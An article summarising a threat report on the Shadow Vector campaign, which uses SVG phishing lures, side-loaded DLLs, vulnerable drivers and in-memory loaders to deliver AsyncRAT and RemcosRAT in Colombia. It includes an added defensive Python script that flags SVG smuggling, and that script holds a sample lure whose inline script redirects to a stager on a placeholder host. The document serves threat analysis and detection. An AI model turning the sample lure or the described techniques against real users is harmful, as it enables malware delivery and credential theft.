
The Acronis Threat Research Unit (TRU) has uncovered a stealthy and technically mature malware campaign dubbed Shadow Vector, targeting victims in Colombia. What sets this campaign apart is its use of malicious SVG (Scalable Vector Graphics) files as phishing lures—part of a broader evolution in smuggling techniques to deliver Remote Access Trojans (RATs), steal credentials, and evade detection.
“Shadow Vector blends traditional social engineering, public infrastructure abuse and stealthy execution techniques,” notes the report, “reflecting a high level of operational flexibility and an evolving technical maturity of regional threat actors in Latin America.”
The campaign begins with a carefully crafted phishing email impersonating Colombia’s labor courts, attaching what appears to be a legitimate court notice. In reality, the attachment is a malicious SVG file that bypasses traditional email security controls and delivers links to stagers or password-protected ZIP payloads hosted on trusted platforms like Dropbox, Bitbucket, or Discord CDN.
These files contain legitimate-looking executables alongside weaponized DLLs, delivering RATs like AsyncRAT and RemcosRAT via DLL side-loading or driver-based privilege escalation.
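As an added defender-side example (not code from the Acronis report or the campaign itself), a small Python triage script that parses an SVG attachment like the lure described above and flags the smuggling indicators the campaign relies on: inline script or event handlers, embedded HTML, data URIs, and links to the file-hosting platforms the report names. The sample SVG, the hostname list and the function names `triage_svg` / `is_suspicious` are constructed here for illustration.

```python
import re
import xml.etree.ElementTree as ET  # untrusted input in production should go through defusedxml instead
# File-hosting platforms the report names as carriers of stagers and ZIP payloads.
ABUSED_HOSTS = ("dropbox.com", "bitbucket.org", "cdn.discordapp.com")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Constructed sample mimicking the lure pattern: a "court notice" drawing that wraps a link
# to an external payload host and carries inline script. Not a real sample from the campaign.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="600" height="400">
  <text x="20" y="40">Notificacion Judicial - Juzgado Laboral</text>
  <a xlink:href="https://www.dropbox.com/s/PLACEHOLDER/notificacion.zip?dl=1">
    <rect x="20" y="60" width="200" height="40" fill="blue"/>
  </a>
  <script type="text/javascript">location = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvc3RhZ2VyLnppcA==");</script>
</svg>"""

def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]

def triage_svg(svg_text):
    """Return (indicator, detail) findings that mark an SVG as a smuggling lure."""
    findings = []
    for el in ET.fromstring(svg_text).iter():
        tag, text = _local(el.tag), (el.text or "").strip()
        if tag == "script":
            findings.append(("script_element", text[:50]))
            blob = B64_BLOB.search(text)
            if blob:  # encoded URL or second stage hidden inside the script body
                findings.append(("base64_blob_in_script", blob.group()[:24]))
        elif tag == "foreignObject":
            findings.append(("foreign_object", "HTML content embedded in SVG"))
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):  # onload=, onclick=, ... run when the image is rendered
                findings.append(("event_handler", f"{a}={value[:50]}"))
            elif a == "href":
                if value.startswith("data:"):
                    findings.append(("data_uri", value[:30]))
                else:
                    host = re.sub(r"^[a-z]+://", "", value, flags=re.I).split("/")[0].lower()
                    if any(host == h or host.endswith("." + h) for h in ABUSED_HOSTS):
                        findings.append(("external_payload_host", host))
    return findings

def is_suspicious(svg_text):
    """Flag a lure that carries active content or links out to an abused hosting platform."""
    kinds = {k for k, _ in triage_svg(svg_text)}
    return bool(kinds & {"script_element", "event_handler", "foreign_object", "external_payload_host"})
```

`is_suspicious` treats only active content and external payload links as blocking indicators; data URIs and base64 blobs are reported for the analyst but do not by themselves flag the file.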
Once extracted, the malware uses a technique involving a decoy executable and a rogue mscorlib.dll, which appears benign but is in fact malicious.
“The attack uses DLL side loading, where the clean-looking executable loads the malicious DLL and starts the AsyncRAT infection process.”
The malware then hollows out a legitimate process (AddInProcess32.exe) and injects its payload to operate invisibly under the context of a trusted binary.
In more advanced cases, Shadow Vector includes vulnerable kernel drivers, such as those from WiseCleaner (CVE-2023-1486) and Zemana (CVE-2022-42045), to gain system-level privileges.
“Both vulnerable drivers are launched as kernel-mode services… used for kernel-level privilege escalation.”
Once installed, RemcosRAT enables complete control over the victim’s machine, with capabilities ranging from keylogging to remote desktop access and browser credential theft.
The latest iteration introduces Katz Loader, a dynamic .NET payload that runs entirely in memory, fetched from services like Paste.ee or the Internet Archive.
“This loader is delivered through a multistage infection chain… and executes payloads dynamically and entirely in memory, leaving minimal traces behind.”
The loader employs:
- UAC bypass via cmstp.exe
- Anti-analysis and sandbox detection
- Base64 payloads hidden inside image files
- Persistence via scheduled tasks and obfuscated registry paths
Portuguese-language strings in the loader suggest ties to Brazilian banking malware ecosystems, possibly pointing to shared codebases or cross-regional collaboration.
The campaign’s final payloads include a rich configuration decrypted from embedded resources. These settings control:
- C2 communication endpoints (asynk02[.]duckdns[.]org)
- Installation behavior and persistence methods
- Plugins for clipboard hijacking, browser token theft, and cryptocurrency wallet hunting
Each infection transmits victim metadata and maintains a keylogger thread, watching every keystroke and monitoring screen activity.
Shadow Vector represents a disturbing leap in phishing sophistication—weaponizing trust, abusing public infrastructure, and innovating on malware deployment with near-forensic precision.
“While its current use centers on stealing sensitive and confidential data,” the report warns, “its capabilities suggest potential for expansion into more destructive actions such as ransomware deployment.”